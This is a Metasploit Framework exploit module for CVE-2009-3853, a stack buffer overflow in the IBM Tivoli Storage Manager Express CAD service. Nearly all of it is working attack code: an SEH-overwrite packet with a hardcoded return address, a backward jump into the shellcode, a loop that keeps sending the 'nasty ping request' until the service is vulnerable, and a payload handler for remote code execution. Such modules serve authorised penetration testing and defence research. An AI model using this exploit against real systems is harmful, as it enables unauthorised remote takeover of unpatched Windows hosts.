IBM Tivoli Storage Manager Express CAD Service Buffer Overflow

`##  
# $Id: ibm_tsm_cad_ping.rb 7924 2009-12-20 11:09:39Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service.  
By sending a "ping" packet containing a long string, an attacker can execute arbitrary code.  
  
NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order   
for the vulnerable code to be reached. This state doesn't appear to be reachable when the   
TSM server is not running. This service does not restart.  
},  
'Author' => [ 'jduck' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 7924 $',  
'References' =>  
[  
[ 'CVE', '2009-3853' ],  
[ 'OSVDB', '59632' ]  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
},  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 380, # offset to seh is 384  
'BadChars' => '', # none!  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
# this target should be pretty universal..  
# dbghelp.dll is shipped with TSM Express, and hasn't been kept up-to-date..  
[ 'IBM Tivoli Storage Manager Express 5.3.6.2', { 'Ret' => 0x028495d3 } ], # p/p/r dbghelp.dll v6.0.17.0  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Nov 04 2009'))  
  
register_options( [ Opt::RPORT(1582) ], self.class )  
  
end  
  
def exploit  
  
print_status("Trying target %s..." % target.name)  
  
# wchar_t buf[64];  
  
#print_status("Generating sploit data...")  
distance = payload_space + 8  
backjmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string  
copy_len = distance + backjmp.length + (1024*3)  
  
sploit = [0,copy_len].pack('n*')  
sploit << payload.encoded  
sploit << generate_seh_record(target.ret)  
sploit << backjmp  
# force hitting end of the stack  
sploit << rand_text(1024) * 3  
  
data = [sploit.length,0x26,0xa5].pack('nCC')  
data << sploit  
  
got_it = false  
while not got_it  
connect  
print_status("Sending nasty ping request...")  
sock.put(data)  
  
begin  
buf = sock.get_once(-1, 5)  
rescue  
print_status("Hrm, the service is probably in the wrong state, stand by...")  
disconnect  
select(nil, nil, nil, 5)  
next  
end  
got_it = true  
end  
  
print_status("Starting handler...")  
handler  
disconnect  
end  
  
end  
`